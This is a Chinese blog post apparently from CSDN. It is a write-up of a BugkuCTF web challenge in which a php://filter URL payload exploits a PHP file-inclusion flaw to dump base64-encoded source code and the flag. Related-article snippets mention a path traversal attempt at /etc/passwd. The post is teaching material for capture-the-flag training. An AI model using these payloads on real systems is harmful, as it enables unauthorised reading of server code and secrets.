BugkuCTF-WEB题文件包含

最新推荐文章于 2023-06-05 20:30:00 发布
最新推荐文章于 2023-06-05 20:30:00 发布
阅读量748 收藏 6
点赞数 2
分类专栏: # BugkuCTF-WEB 文章标签: php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/am_03/article/details/119938871
版权

1.打开网页,点击click me? no链接
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
URL栏里显示:http://114.67.246.176:15077/index.php?file=show.php,可能存在文件包含漏洞

这里介绍一下:php:// 协议
条件:
allow_url_fopen:off/on
allow_url_include :仅php://input php://stdin php://memory php://temp 需要on
作用:
php:// 访问各个输入/输出流(I/O streams),在CTF里经常使用的是php://filter和php://input,php://filter用于读取源码,php://input用于执行php代码。

2构造payload:
http://114.67.246.176:15077/index.php?file=php://filter/read=convert.base64-encode/resource=index.php
在这里插入图片描述
77u/PGh0bWw+DQogICAgPHRpdGxlPkJ1Z2t1LXdlYjwvdGl0bGU+DQogICAgDQo8P3BocA0KCWVycm9yX3JlcG9ydGluZygwKTsNCglpZighJF9HRVRbZmlsZV0pe2VjaG8gJzxhIGhyZWY9Ii4vaW5kZXgucGhwP2ZpbGU9c2hvdy5waHAiPmNsaWNrIG1lPyBubzwvYT4nO30NCgkkZmlsZT0kX0dFVFsnZmlsZSddOw0KCWlmKHN0cnN0cigkZmlsZSwiLi4vIil8fHN0cmlzdHIoJGZpbGUsICJ0cCIpfHxzdHJpc3RyKCRmaWxlLCJpbnB1dCIpfHxzdHJpc3RyKCRmaWxlLCJkYXRhIikpew0KCQllY2hvICJPaCBubyEiOw0KCQlleGl0KCk7DQoJfQ0KCWluY2x1ZGUoJGZpbGUpOyANCi8vZmxhZzpmbGFne2E2MTc3MDZiY2U0NWJkZGFhY2U5NmQ0NDYyYjhmODkxfQ0KPz4NCjwvaHRtbD4NCg==
相当于得到了源代码进行base64编码之后的结果,只需进行base64解码即可获取源代码

在这里插入图片描述
得到flag。

彬彬有礼am_03
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF-WEB入门DOC-2019版1
08-03
2. 靶场:如BUUOJ、南邮0xCTF、CTF.show、CTFhub、BugKuCTF、攻防世界等,提供实践环境。 3. 学习平台:CTF-Wiki-Web、dalao们的博客、先知社区、freebuf、安全客等。 4. 书籍:《白帽子讲Web安全》、《Web安全攻防...
NodeJS遍历文件生产文件列表
a560694091的博客
11-15 190
本文实例讲述了NodeJS遍历文件生产文件列表功能。分享给大家供大家参考,具体如下: 功能需求:在工作中我们可能经常需要知道项目中静态文件列表发布,一个一个去检索写,那就太苦逼了。 要想知道里面的文件列表是不是很蛋疼,可能我们也会有dos tree去获取。 这里分享一下,通过node,知道文件路径,并配置远程路径,直接copy,发布。 新建filelist.js 里面都有注释...
Bugku CTF-web8 文件包含
weixin_44023403的博客
04-22 469
Bugku CTF-web8 文件包含前言解 前言 文件包含概述: 和SQL注入等攻击方式一样,文件包含漏洞也是一种“注入型漏洞”,其本质就是输入一段用户能够控制的脚本或者代码,并让服务器端执行。 包含: 我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程就叫做包含。 有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。 PH
BUUCTF web之Include
good good study
11-20 933
目提示Include,那考察的应该是文件包含漏洞访问如下点击tips,提示“can you find out the flag?”,观察url为"?file=flag.php"可知为文件包含的形式。
文件包含BUGKU BUUCTF
zbbjya的博客
03-16 244
查看源代码 图片显示为文件包含 抓了一下包没啥发现 改了一下头,使用php://input 好像也没有什么用 说明这样的方式是不对的php伪协议 有 php://input 伪协议相当于一个削弱post的方法 php://filter可以获取指定文件源码,php://filter 是php中独有的一个协议,可以作为一个中间流来处理其他流,可以进行任意文件的读取;根据名字,filter,可以很容易想到这个协议可以用来过滤一些东西; 然后我们试试用这个 具体用法可看 https://blog.csdn.ne
07BugkuCTF文件包含项目
qq_28241709的博客
08-05 529
进入BugkuCTF之前我们先了解一下文件包含的基础知识。 一、文件包含 1.概念 文件包含:程序员通常会把可重复使用函数或语句写到单个文件中,在使用某个功能时,直接调用此文件,不用再编写调用文件的过程称为包含。 2.PHP 中的⽂件包含语句 PHP 提供了四个⽂件包含的语句,四个语句之间略有不同: 语句 区别 include() 多次包含,如果包含失败,脚本产⽣警告,继续运⾏。 include_once() ⼀次包含,如果包含失败,脚本产⽣警告,继续运⾏。 require() 多次
BugKu 2021 CTF AWD 排位赛 真 S2 AWD排位赛-7.zip
12-07
【描述】"BugKu 2021 CTF AWD 排位赛 真" 提示我们这个压缩包文件包含了2021年BugKu CTF排位赛的实际目,这意味着解压后,参赛者或学习者将能接触到真实的比赛场景,进行实战演练,提高自己的网络安全能力。...
006-CTF web总结-第六课 CTF WEB实战练习(二) .pdf
07-09
可能与文件包含漏洞有关,参赛者需要了解如何利用文件路径控制或者远程文件包含来读取服务器上的特定文件,通常包括flag信息。 3. **bugku-ctf 第三:速度要快** 这个目可能测试的是XSS(跨站脚本攻击)或...
BugKu 2021 S1 AWD排位赛-7.zip
12-07
BugKu 2021 S1 AWD排位赛-7.zip】是一个与网络安全相关的挑战,源自2021年BugKu CTF(Capture The Flag)比赛的 Automated Web Defense (AWD) 排位赛阶段。CTF是一种网络安全竞赛,参赛者通过解决各种安全来...
Bugku Web CTF-文件包含2
No Title
12-31 433
Bugku Web CTF-文件包含2 打开是一个页面,目提示是文件包含,url的格式也很典型: http://123.206.31.85:49166/index.php?file=hello.php 尝试最简单的思路http://123.206.31.85:49166/index.php?file=../../../../../../../../../etc/pass,然后页面显示大字NA...
文件包含-BugkuCTF
yuqie的博客
06-05 163
flag也藏在其中!
Bugkuctf web---------welcome to bugkuctf
Amire0x的小乐园
05-04 702
今天做到了一道比较有收获的,所以呢就打算记下来,涉及到了文件包含的知识,复习复习,对于目前滴俺来说,确实有难度! 目链接 首先打开目,如图 查看源码 好的!注释成功引起了我们的注意,第一个线索找到了! 好吧,让我们来分析一下源码 开始来了仨变量,user,file,pass。(跟踪变量有肉吃!) 部分陌生的函数理解: isset——判断变量是否声明,即user补位空 file_get_c...
【ctf】文件包含漏洞(一)
wlllllianqing的博客
10-06 2193
文件包含 开发人员将相同的函数写入单独的文件中,需要使用某个函数时直接调用此文件,无需再次编写,这种文件调用的过程称文件包含 文件包含漏洞 开发人员为了使代码更灵活,会将被包含的文件设置为变量,用来进行动态调用,从而导致客户端可以恶意调用一个恶意文件,造成文件包含漏洞 相关函数: include() include_once() require() require_once() (未完持续…) ...
南邮杯CTF 文件包含漏洞实战
永远是少年
12-14 858
今天继续给大家介绍CTF刷,本文主要内容是南邮杯CTF 文件包含漏洞实战。 一、目简介 二、解思路 三、解实战
CTF实战练习:文件包含漏洞
烟雨天青色
08-06 3841
CTF实战练习:http://120.78.xx.xxx:8012 首先打开目链接,已知的是这是一道关于文件包含目,既然是文件包含目,那就按照一般的步骤来喽。 先说一下,我拿到这道目之后我的思路,因为之前博客中也写过关于文件包含漏洞的目,就按照之前的思路来了。第一步,首先我输入了解链接之后,网页链接变成了xxxx/index.php?file=hello.php,这就很明显...
文件包含 [ACTF2020 新生赛]Include1(php://filter协议)
一醉一休的博客
02-23 559
前言 服务器解析执行php文件时能够通过包含函数加载另外一个文件中的php代码,当被包含的文件中存在木马时,也就意味着木马程序会在服务器上加载执行 一、[ACTF2020 新生赛]Include1(php://filter协议) 1)一点开目,没看到什么,点这个提示 2)只有这一句话 3)可以看到网址后面多了一个文件,也没有发现其他东西,可能是文件包含 4)文件包含直接读取的是文件,而不是文件源码,所以要想办法读取源码 php://filter/read=convert....
文件包含漏洞 基础
weixin_50464560的博客
03-21 892
CTF中文件包含漏洞总结 0x01 什么是文件包含漏洞 通过PHP函数引入文件时,传入的文件名没有经过合理的验证,从而操作了预想之外的文件,就可能导致意外的文件泄漏甚至恶意代码注入。 0x02 文件包含漏洞的环境要求 allow_url_fopen=On(默认为On) 规定是否允许从远程服务器或者网站检索数据allow_...
click me? no
qq_48511129的博客
01-26 1569
思路:看到index.php,可能是文件包含漏洞,于是我去网上找了一下文件包含漏洞构造url,查看文件内容 http://114.67.246.176:15492/index.php?file=php://filter/read=convert.base64-encode/resource=index.php得到一串代码 我用burpsuite编码器进行base64解码得到flag ...
bugku ctf sqli-0x1
最新发布
03-23
bugku ctf是一个CTF(Capture The Flag)比赛平台,提供各种类型的安全挑战目供参赛者解答。sqli-0x1是其中一个SQL注入目,下面是该目的解思路: 1. 目描述:sqli-0x1是一个简单的SQL注入目,要求获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值